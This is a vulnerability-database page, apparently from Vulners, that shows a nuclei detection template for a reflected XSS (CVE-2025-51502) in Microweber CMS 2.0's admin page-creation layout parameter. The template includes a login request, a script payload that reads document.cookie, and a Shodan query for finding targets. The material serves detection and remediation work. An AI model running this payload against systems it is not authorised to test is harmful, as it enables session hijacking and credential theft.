Lucene search
K

Microweber CMS 2.0 - Reflected XSS in Admin Page Creation

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Reflected XSS on Microweber CMS 2.0 admin page creation via layout parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-51502
25 Aug 202521:02
circl
CNNVD
Microweber CMS 安全漏洞
1 Aug 202500:00
cnnvd
CVE
CVE-2025-51502
1 Aug 202500:00
cve
Cvelist
CVE-2025-51502
1 Aug 202500:00
cvelist
EUVD
EUVD-2025-23376
3 Oct 202520:07
euvd
Github Security Blog
Microweber has Reflected XSS Vulnerability in the layout Parameter
1 Aug 202518:31
github
NVD
CVE-2025-51502
1 Aug 202517:15
nvd
OSV
CVE-2025-51502
1 Aug 202500:00
osv
OSV
GHSA-MVJ3-HC7J-VP74 Microweber has Reflected XSS Vulnerability in the layout Parameter
1 Aug 202518:31
osv
Positive Technologies
PT-2025-31651 · Unknown · Microweber Cms
1 Aug 202500:00
ptsecurity
Rows per page
id: CVE-2025-51502

info:
  name: Microweber CMS 2.0 - Reflected XSS in Admin Page Creation
  author: nukunga
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) exists in Microweber CMS 2.0 through the layout parameter on the /admin/page/create page. It allows arbitrary JavaScript to execute in the context of authenticated admin users.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victim browsers through the layout parameter in page creation, potentially enabling session hijacking and credential theft.
  remediation: |
    Upgrade Microweber CMS to a version later than 2.0 that properly sanitizes the layout parameter.
  reference:
    - https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51502
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51502
  metadata:
    verified: true
    max-requests: 2
    vendor: microweber
    product: microweber
    shodan-query: 'http.title:"Microweber"'
  tags: cve,cve2025,microweber,xss,authenticated,vuln

variables:
  xss_payload: "><script>alert(document.cookie)</script>"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}&lang=en_US&where_to=admin_content

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "success\":", "username\":")'
        condition: and
        internal: true

  - raw:
      - |
        GET /admin/page/create?layout="{{xss_payload}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "><script>alert(document.cookie)</script>")'
        condition: and
# digest: 490a0046304402201968c096f5bcbb080f1dbf4097b52912418193bbc1a84b3877824d069a13849602204e37c2c3fc257f72cd23a85bbc35e6d75b43166c4813af02be7d8e8e63c795c2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00765
SSVC
10